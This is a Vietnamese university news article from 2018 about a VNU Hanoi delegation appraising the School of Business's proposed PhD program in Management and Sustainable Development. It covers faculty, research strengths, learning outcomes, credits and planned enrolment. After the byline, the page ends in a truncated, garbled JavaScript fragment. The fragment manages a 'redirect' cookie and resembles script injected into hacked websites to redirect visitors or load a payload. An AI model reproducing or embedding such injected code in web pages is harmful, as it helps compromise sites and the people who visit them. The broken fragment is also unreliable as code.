Đánh giá thẩm định điều kiện mở Chương trình đào tạo Tiến sĩ tại HSB

Đoàn công tác của ĐHQGHN đã đánh giá cao sự chuẩn bị của Khoa Quản trị và Kinh doanh cho việc mở một chuyên ngành đào tạo mới mẻ, có tính thực tiễn cao.

Sáng 18/10/2018, Đoàn công tác của Đại học Quốc gia Hà Nội đã có buổi làm việc thẩm định điều kiện mở mã ngành Tiến sĩ, chuyên ngành Quản trị và Phát triển bền vững (Doctor in Management and Sustainable Development – DMS) của Khoa Quản trị và Kinh doanh (HSB).

GS.TSKH Nguyễn Đình Đức – Trưởng Đoàn công tác nhận định: “Mở đề án đào tạo bậc tiến sĩ là một trong những điều kiện đánh giá sự phát triển về học thuật của một đơn vị đào tạo, và Khoa Quản trị và Kinh doanh là một đơn vị như vậy. Trên cơ sở tự chủ tài chính và học thuật, HSB đã nhanh nhạy, mạnh dạn xây dựng chương trình đào tạo Tiến sĩ mới, đó là một kết quả đáng ghi nhận của Ban chủ nhiệm Khoa, đội ngũ giảng viên, nhà khoa học của Khoa Quản trị và Kinh doanh”.

HSB-DMS 2

HSB-DMS 8

Theo báo cáo trình bày các điều kiện mở Chương trình đào tạo Tiến sĩ, PGS.TS Nguyễn Ngọc Thắng – Phó Chủ nhiệm khoa, Đồng tác giả chương trình, Khoa Quản trị và Kinh doanh đã chuẩn bị đầy đủ các điều kiện để mở chương trình đào tạo mới. Trong đó, đội ngũ giảng viên viên là các giáo sư, phó giáo sư, tiến sĩ có uy tín trong nước và quốc tế, với 23 giảng viên cơ hữu, thỉnh giảng; 10 chuyên gia, giảng viên từ các đơn vị khác hợp tác giảng dạy, nghiên cứu.

Với hướng nghiên cứu chuyên sâu về các lĩnh vực: Kinh tế ứng dụng, Quản trị kinh doanh, Phát triển bền vững, Quản trị An ninh phi truyền thống, các giảng viên, nhà khoa học của HSB đã có nhiều bài bài báo quốc tế, bài báo trong nước và xây dựng giáo trình các bộ môn. HSB hiện đã có nhiều đề tài nghiên cứu khoa học đạt giải Nafosted và các giải thưởng NCKH cấp ĐHQGHN. Hệ thống giáo trình và tài liệu tham khảo phục vụ cho việc nghiên cứu của học viên đã được trang bị đầy đủ, phong phú tại thư viện của HSB, thư viện ĐHQGHN, thư viện điện tử của các đối tác liên kết đào tạo với HSB, tài liệu in và điện tử phục vụ trực tiếp các môn học trong chương trình đào tạo.

Đoàn công tác bao gồm đại diện các Ban, phòng chức năng của ĐHQGHN đã đánh giá cao sự chuẩn bị của Khoa Quản trị và Kinh doanh cho việc mở một chuyên ngành đào tạo mới mẻ, có tính thực tiễn cao. Đây là những điều kiện đảm bảo cho sự thành công của chương trình.

HSB-DMS 6

HSB-DMS 4

Trước đó, vào tháng 3/2018, Khoa Quản trị và Kinh doanh đã bảo vệ thành công Đề án đào tạo Tiến sĩ Quản trị và Phát triển bền vững cấp ĐHQG Hà Nội. Đây là một trong những chương trình đào tạo được Khoa Quản trị và Kinh doanh đặt làm chương trình trọng tâm, hướng tới mục tiêu trở thành trường Đại học vào năm 2020.

Đại diện nhóm soạn thảo, PGS.TS Nguyễn Ngọc Thắng – Phó Chủ nhiệm Khoa Quản trị và Kinh doanh đã trình bày tóm tắt Đề án, trong đó nhấn mạnh giá trị mà Đề án hướng tới là nhằm đào tạo các tiến sĩ chuyên ngành Quản trị và Phát triển bền vững, những người có trình độ thực hiện được các nghiên cứu độc lập, có thể đưa ra được các luận cứ khoa học về lĩnh vực khoa học quản trị và phát triển bền vững trên phương diện là chuyên gia, góp phần cung cấp các cơ sở khoa học cho việc hoạch định chính sách phát triển cũng như điều hành doanh nghiệp.

Người học sau khi nhận được học vị tiến sĩ có thể trở thành các chuyên gia nghiên cứu, tư vấn cao cấp, giảng viên đại học, các nhà quản trị và hoạch định chính sách trong lĩnh vực quản trị công/tư, tổng giám đốc/giám đốc các tập đoàn kinh tế.

Chuẩn đầu ra của Chương trình đào tạo bậc Tiến sĩ Quản trị và Phát triển bền vững hướng tới đảm bảo NCS có kiến thức chuyên sâu về các lí thuyết quản trị, kinh tế và phát triển bền vững hiện đại, các tư duy mới trong quản trị và phát triển tổ chức, nắm vững các công nghệ quản trị doanh nghiệp hiện đại; hiểu và giải thích được cơ cấu vận hành của hệ thống quản trị tổ chức và doanh nghiệp trong bối cảnh cụ thể.

Với những tri thức được trang bị trong chương trình, NCS có thể suy luận và mở rộng những kiến thức chuyên sâu về quản trị, kinh tế và phát triển bền vững của thế giới, tích hợp và áp dụng sao cho phù hợp với điều kiện cụ thể của Việt Nam.

Với Chương trình đào tạo Tiến sĩ Quản trị và Phát triển bền vững, NCS được đào tạo từ 94 đến 103 tín chỉ trong thời gian từ 3 – 5 năm tại Khoa Quản trị và Kinh doanh (HSB) – ĐHQG Hà Nội. Dự kiến quy mô tuyển sinh là 10 nghiên cứu sinh/năm từ năm 2019.

Thùy Dung

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’